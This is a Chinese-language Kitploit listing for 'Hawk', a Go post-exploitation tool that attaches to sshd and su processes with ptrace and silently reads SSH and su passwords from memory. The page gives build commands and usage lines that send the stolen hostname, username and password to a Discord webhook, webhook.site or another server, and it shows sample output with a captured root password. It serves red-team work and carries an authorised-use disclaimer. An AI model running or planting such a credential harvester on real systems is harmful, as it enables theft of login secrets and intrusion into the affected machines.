Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
Hawk — Golang工具,旨在通过 sshd和su服务窃取发现的密码。 | Kitploit
工具/GitHubGitHub/prodefense/hawk
密码攻击数据泄露信息收集后渗透利用渗透测试红队
GitHubprodefense/hawk

Hawk

Golang工具,旨在通过 sshd和su服务窃取发现的密码。

查看仓库
3869个月前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享



Hawk

实时静默拦截 SSH 和 SU 凭据

Hawk 监控 sshd 和 su 进程,通过 ptrace 从内存中提取密码,不修改目标进程。零写入。纯只读凭据收集。

演示

示例

工作原理

Hawk 利用 Linux 的 /proc 文件系统发现 SSH 和 SU 进程,然后使用 ptrace 附加并拦截系统调用。当密码认证发生时,它在 write() 系统调用期间直接从进程内存读取密码——对目标进程完全透明。凭据通过 webhook 外泄或打印到 stdout。

深入探讨: 博客文章

构建

root@kitploit:~
GOOS=linux GOARCH=amd64 CGO_ENABLED=0 go build -o hawk

使用

Discord Webhook

Hawk 自动检测 Discord webhooks 并发送格式化消息:

root@kitploit:~
./hawk https://discord.com/api/webhooks/YOUR_WEBHOOK_ID/YOUR_WEBHOOK_TOKEN

设置: 按照 Discord 的 webhook 指南 在你的 Discord 服务器中创建一个 webhook。凭据将以 hostname、username 和 password 格式显示在你的频道中。

通用 Webhooks

对于其他 webhook 服务(webhook.site、自定义服务器等):

root@kitploit:~
# HTTPS(自动检测)
./hawk https://webhook.site/your-unique-id

# HTTP
./hawk http://192.168.1.100:6969/webhook

# 如果未指定协议,自动使用 HTTPS
./hawk webhook.example.com/path

Stdout 模式

没有 webhook?凭据打印到 stdout:

root@kitploit:~
./hawk

输出:

root@kitploit:~
hostname=server01 username=root password=SuperSecret123

要求

  • 支持 ptrace 的 Linux 系统
  • 已挂载 /proc 文件系统
  • Root 权限(ptrace 需要)

免责声明

此工具仅用于授权的安全测试和教育目的。 未经授权访问计算机系统是非法的。请负责任地使用,仅在你拥有或明确允许测试的系统上使用。

致谢

灵感来源于 blendin 的 3snake 项目。

下载工具